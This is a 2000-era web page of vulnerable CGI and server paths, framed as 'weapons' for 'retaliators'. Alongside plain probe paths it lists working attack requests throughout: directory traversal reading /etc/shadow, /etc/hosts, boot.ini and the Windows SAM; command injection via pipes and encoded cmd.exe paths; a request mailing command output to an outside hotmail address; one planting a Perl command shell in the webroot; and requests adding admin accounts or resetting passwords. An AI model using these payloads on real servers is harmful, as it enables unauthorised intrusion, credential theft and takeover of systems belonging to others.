Rudi Carell's very powerful "weak CGIs" list
(December 2000)

Courtesy of www.searchlores.org
The incorrect use of the CGI scripts implies many vulnerabilities for the system hosting them.
Rudi Carell [you may contact Rudi @ rudicarellALT+64hotmail(point)com] has listed quite a lot of -ahem-
interesting WEAK CGIs... a treasure-chest of interesting weapons for searchers and "retaliators" alike.

/test.php3
/cgi-bin/test.php3
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/ConsoleHelp/
/*.shtml/
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/inc/
/include/
/iisadmpwd/
/iissamples/
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/global.asa
/global.asa+.htr
/global.asa\
/default.asp+.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/scripts/perl.exe
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/campas
/cgi-bin/view-source
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/search97/s97_cgi.exe
/search97/search97.vts
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/mall_log_files/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/quikstore.cfg
/orders/mountain.cfg
/orders/orders.txt
/Admin_files/order.log
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:5000/
:2301
:3128/../../../../
:9090
:901
:8383
:800/../..\
:800/C:/
/adsamples/config/site.csc
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/AdvWorks/equipment/catalog_type.asp
/scripts/repost.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/rwwwshell.pl
/~root
/cgi-bin/imagemap.exe
/../../../../config.sys
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst.bat
/cgi-bin/tst2.bat
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat
/cgi-bin/get32.exe
/cgi-bin/tst.bat
/cgi-bin/alibaba.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/cgitest.exe
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/webwho.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/cgi-bin/plusmail
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/iishelp/iis/misc/iirturnh.htw
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/Ultimate.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/cgi-bin/postings.cgi
/cgi-bin/core
/.htaccess
/.htpasswd
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/loadpage.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/postcard.pl
/cgi-bin/.fhp
/cgi-bin/clickresponder.pl
/cgi-win/uploader.exe
/cgi-bin/uploadn.asp
/cgi-bin/excite
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/jsp/source.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/dcforum/install_help.cgi
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/c32web.exe/ChangeAdminPassword
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.pl
/cgi-bin/allmanage.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/ads.cgi
/cgi-bin/admin.cgi
/ads/admin.cgi
/cgi-bin/adpassword.txt
/ads/adpassword.txt
/cgi-bin/infosrch.cgi
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/.www.my.cnf
/cgi-bin/.www.my.cnf
/cgi-bin/futureforum.cgi
/examples/applications/bboard/bboard_frames.html
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/[email protected]&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/[email protected]&FileName=mailfile:[email protected]
/cgi-bin/[email protected]&filename=mailfile.cgi
/cgi-bin/[email protected][email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/..../
/~nobody/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/c/s.dll/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/index.php3?vhosts=http://go.to
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/+/
/./
/+./
/++/
/++./
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/[email protected]
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/[email protected]
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php

Good luck, good hunt!

To ideale3
Back to ideale
(c) 2000: [fravia+], all rights reserved